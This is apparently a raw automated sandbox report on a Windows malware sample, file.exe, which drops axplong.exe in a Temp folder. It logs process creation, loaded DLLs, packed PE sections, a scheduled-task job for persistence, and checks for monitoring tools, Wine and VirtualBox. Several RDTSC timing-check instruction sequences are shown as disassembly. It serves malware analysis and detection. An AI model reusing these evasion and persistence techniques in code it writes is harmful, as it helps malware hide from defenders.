Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1877504 > 1048576

Source: file.exe

Static PE information: Raw size of mjqourvh is bigger than: 0x100000 < 0x198a00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.280000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mjqourvh:EW;duhvzjsi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mjqourvh:EW;duhvzjsi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 1.2.axplong.exe.ce0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mjqourvh:EW;duhvzjsi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mjqourvh:EW;duhvzjsi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.ce0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mjqourvh:EW;duhvzjsi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mjqourvh:EW;duhvzjsi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 6.2.axplong.exe.ce0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mjqourvh:EW;duhvzjsi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mjqourvh:EW;duhvzjsi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 8.2.axplong.exe.ce0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mjqourvh:EW;duhvzjsi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mjqourvh:EW;duhvzjsi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 9.2.axplong.exe.ce0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mjqourvh:EW;duhvzjsi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mjqourvh:EW;duhvzjsi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 10.2.axplong.exe.ce0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mjqourvh:EW;duhvzjsi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mjqourvh:EW;duhvzjsi:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1cbcf1 should be: 0x1d0720
Source: file.exe	Static PE information: real checksum: 0x1cbcf1 should be: 0x1d0720

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: mjqourvh
Source: file.exe	Static PE information: section name: duhvzjsi
Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: mjqourvh
Source: axplong.exe.0.dr	Static PE information: section name: duhvzjsi
Source: axplong.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 1_2_00CFD84C push ecx; ret

1_2_00CFD85F

Source: file.exe	Static PE information: section name: entropy: 7.985952425600344
Source: file.exe	Static PE information: section name: mjqourvh entropy: 7.954053872063057
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.985952425600344
Source: axplong.exe.0.dr	Static PE information: section name: mjqourvh entropy: 7.954053872063057

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EF1F5 second address: 2EF1FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2EF1FB second address: 2EF21B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA955157A04h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46020A second address: 460226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA954E703D5h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 460226 second address: 460245 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9551579FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FA955157A27h 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FA9551579F6h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 460245 second address: 460268 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FA954E703D7h 0x0000000f jmp 00007FA954E703CBh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4638AF second address: 4638B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4638B3 second address: 4638BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4638BD second address: 4638D2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA9551579F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FA9551579F6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4638D2 second address: 4638D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4638D6 second address: 4638EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop esi 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4638EA second address: 463901 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA954E703C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FA954E703C8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 463901 second address: 46397B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA955157A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007FA955157A00h 0x00000013 jo 00007FA9551579FCh 0x00000019 jnc 00007FA9551579F6h 0x0000001f popad 0x00000020 pop eax 0x00000021 mov edx, dword ptr [ebp+122D39D8h] 0x00000027 push 00000003h 0x00000029 mov dword ptr [ebp+122D18CAh], edx 0x0000002f push 00000000h 0x00000031 jmp 00007FA955157A04h 0x00000036 push 00000003h 0x00000038 jmp 00007FA9551579FDh 0x0000003d push E2B02509h 0x00000042 push eax 0x00000043 push edx 0x00000044 jbe 00007FA9551579F8h 0x0000004a push edi 0x0000004b pop edi 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46397B second address: 4639C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 22B02509h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FA954E703C8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a lea ebx, dword ptr [ebp+1244876Fh] 0x00000030 mov ecx, ebx 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 463B00 second address: 463B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 463C5D second address: 463C64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 463C64 second address: 463CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 6E8BF761h 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FA9551579F8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov ecx, edx 0x0000002a or dword ptr [ebp+122D17EBh], ebx 0x00000030 mov dword ptr [ebp+122D2720h], edx 0x00000036 lea ebx, dword ptr [ebp+12448783h] 0x0000003c mov esi, dword ptr [ebp+122D39D0h] 0x00000042 xchg eax, ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FA955157A01h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 463CC1 second address: 463CD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 463CD0 second address: 463CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 463CD4 second address: 463CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 482E41 second address: 482E95 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA9551579F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d jl 00007FA9551579F6h 0x00000013 pop ebx 0x00000014 popad 0x00000015 js 00007FA955157A39h 0x0000001b jng 00007FA955157A0Dh 0x00000021 jmp 00007FA955157A07h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FA955157A08h 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 457BFD second address: 457C02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 457C02 second address: 457C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA9551579F6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 jmp 00007FA955157A05h 0x00000019 pushad 0x0000001a popad 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 457C2E second address: 457C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 481538 second address: 48153C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48153C second address: 48154F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FA954E703CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
